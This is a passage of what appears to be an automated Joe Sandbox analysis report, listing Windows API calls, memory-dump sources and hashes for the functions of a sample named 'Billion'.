                                                                                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 001AF6D4
                                                                                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001AF6F1
                                                                                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001AF72F
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001AF750
                                                                                                                                                                                                                                                                                                          • CountClipboardFormats.USER32 ref: 001AF771
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 001AF7B6
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0bc4bcfca8202b1be861ad923febfa2a37d7bbc75659fa179d763bd5dce9b476
                                                                                                                                                                                                                                                                                                          • Instruction ID: 145a4a9cc5f07fa539b763a78ebaa821a84f1a3e51f0ac31416647e22c0162e3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc4bcfca8202b1be861ad923febfa2a37d7bbc75659fa179d763bd5dce9b476
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C661C339204301AFD300EFA0E889F6ABBA4EF95704F14456DF546C76A2DB31DD86CB62
                                                                                                                                                                                                                                                                                                          Function 001A73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 001A7403
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001A7457
                                                                                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001A7493
                                                                                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001A74BA
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 001A74F7
                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 001A7524
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                          • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cf46fea9fa8229ee5ae324e51df5ac48183e9beaf94ff4409e9c566bab35673
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0f68c3da8f57d45f00a276d8017f50ed60d1feb7a68cd3eb278b484f00c964e7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf46fea9fa8229ee5ae324e51df5ac48183e9beaf94ff4409e9c566bab35673
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D13FB2508344AEC310EBA4CC85EBBB7ECAF99704F44491DF589D7291EB74DA44CB62
                                                                                                                                                                                                                                                                                                          Function 001AA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001AA0A8
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 001AA0E6
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 001AA100
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 001AA118
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA123
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 001AA13F
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001AA18F
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(001F7B94), ref: 001AA1AD
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 001AA1B7
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA1C4
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA1D4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                          • Opcode ID: 88f15a607ea2b7c4aaa972efcbdace23133cce9f6c70087087ce3c45da5f7e3f
                                                                                                                                                                                                                                                                                                          • Instruction ID: d9c17246f890bec929b3206df50dd78b6abcad0db4379020b6a49c526e0ce4f0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f15a607ea2b7c4aaa972efcbdace23133cce9f6c70087087ce3c45da5f7e3f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3831F37660031DBBDB10AFB4EC49EEE77ADAF46361F5000A5F815E2090EB70DE85CA65
                                                                                                                                                                                                                                                                                                          Function 001A4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001A4785
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A47B2
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 001A47E2
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001A4803
                                                                                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 001A4813
                                                                                                                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001A489A
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001A48A5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001A48B0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                          • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                          • Opcode ID: e94ad229bf685ad1b2d861b550f473a823e4f1dd3772a0196b75c38144f11fd8
                                                                                                                                                                                                                                                                                                          • Instruction ID: aa260c410226234ebd0ee0f030f734e4b9202e07c8f62c8db9f3a33e17ebe22d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e94ad229bf685ad1b2d861b550f473a823e4f1dd3772a0196b75c38144f11fd8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4131B2B6500249ABDB219FA0EC49FEB37BCFF8A701F1040B6F519D6060E7B4D6858B24
                                                                                                                                                                                                                                                                                                          Function 001AA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001AA203
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 001AA25E
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA269
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 001AA285
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001AA2D5
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(001F7B94), ref: 001AA2F3
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 001AA2FD
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA30A
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 001AA31A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0019E3B4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                          • Opcode ID: 31077f375b6049b64bb7d6c8b01f33d6d8f8338ebce388958ed3d9048e279174
                                                                                                                                                                                                                                                                                                          • Instruction ID: 15089e93ba026ddc4010cf42586aec260e6c89bd961a497ee37cdfc944e73777
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31077f375b6049b64bb7d6c8b01f33d6d8f8338ebce388958ed3d9048e279174
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E31047550021DAECF10AFB4EC09FEE77ADEF46324F5041A6E811A3090EB71DE95CA55
                                                                                                                                                                                                                                                                                                          Function 001BC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001BC10E,?,?), ref: 001BD415
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD451
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4C8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4FE
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BC99E
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 001BCA09
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001BCA2D
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001BCA8C
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001BCB47
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001BCBB4
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001BCC49
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 001BCC9A
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001BCD43
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001BCDE2
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001BCDEF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f8f9b72bdf9a5eba8432189681ed9d599180018f72c007049a6e49b43a6d435a
                                                                                                                                                                                                                                                                                                          • Instruction ID: b4c3063f06b5902757fa5ea1f68c7d67c6f81e1350128b76f3c15548cd644f86
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8f9b72bdf9a5eba8432189681ed9d599180018f72c007049a6e49b43a6d435a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75025075604200AFD714DF28C895E6ABBE5FF58314F1884ADF849CB2A2DB31ED46CB91
                                                                                                                                                                                                                                                                                                          Function 0019D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001355D1,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00135871
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019EAB0: GetFileAttributesW.KERNEL32(?,0019D840), ref: 0019EAB1
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0019D9CD
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0019DA88
                                                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0019DA9B
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0019DAB8
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0019DAE2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0019DAC7,?,?), ref: 0019DB5D
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0019DAFE
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0019DB0F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                                                                          • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3aac4612ab86820ca6229beef84c9593e8880cd901f10d361df9e8bb18641a4d
                                                                                                                                                                                                                                                                                                          • Instruction ID: f750b4ae67c83c9c1411d245612a165115d94d73e6e30d9fb657b21af6a78760
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aac4612ab86820ca6229beef84c9593e8880cd901f10d361df9e8bb18641a4d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25615E3180514DAFCF05EBE0E992DEDB7B9AF25304F2440A9E502B7195EB31AF09CB61
                                                                                                                                                                                                                                                                                                          Function 001AF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ec57c18d926dba0c568b0e967694d05c23377fe68e324452347fbc9b2b56b6d1
                                                                                                                                                                                                                                                                                                          • Instruction ID: df5f98720677ff6d04ddb11065c59d442c049c1f5d44ad67415447ba80559621
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec57c18d926dba0c568b0e967694d05c23377fe68e324452347fbc9b2b56b6d1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0419D75604611AFE310CF55E888F15BBE0EF45318F14C0ADE8598BA62C735EC82CB90
                                                                                                                                                                                                                                                                                                          Function 0019F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0019205A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00192087
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: GetLastError.KERNEL32 ref: 00192097
                                                                                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0019F249
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                          • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                          • Opcode ID: d8bccf26defdb3506e181834e5b668c6acad16577c7b6c55314475a4ef233c55
                                                                                                                                                                                                                                                                                                          • Instruction ID: f292f39a6f90b93ae80b4376c31e8346194ed12fce1cda3f1e31f64156214aa4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8bccf26defdb3506e181834e5b668c6acad16577c7b6c55314475a4ef233c55
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F01F47A6102147BEF2863B8AC8AFBF766CAB18354F150539FD13E21D2D760DD4291A0
                                                                                                                                                                                                                                                                                                          Function 001322AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?), ref: 0013233E
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00132421
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00132434
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
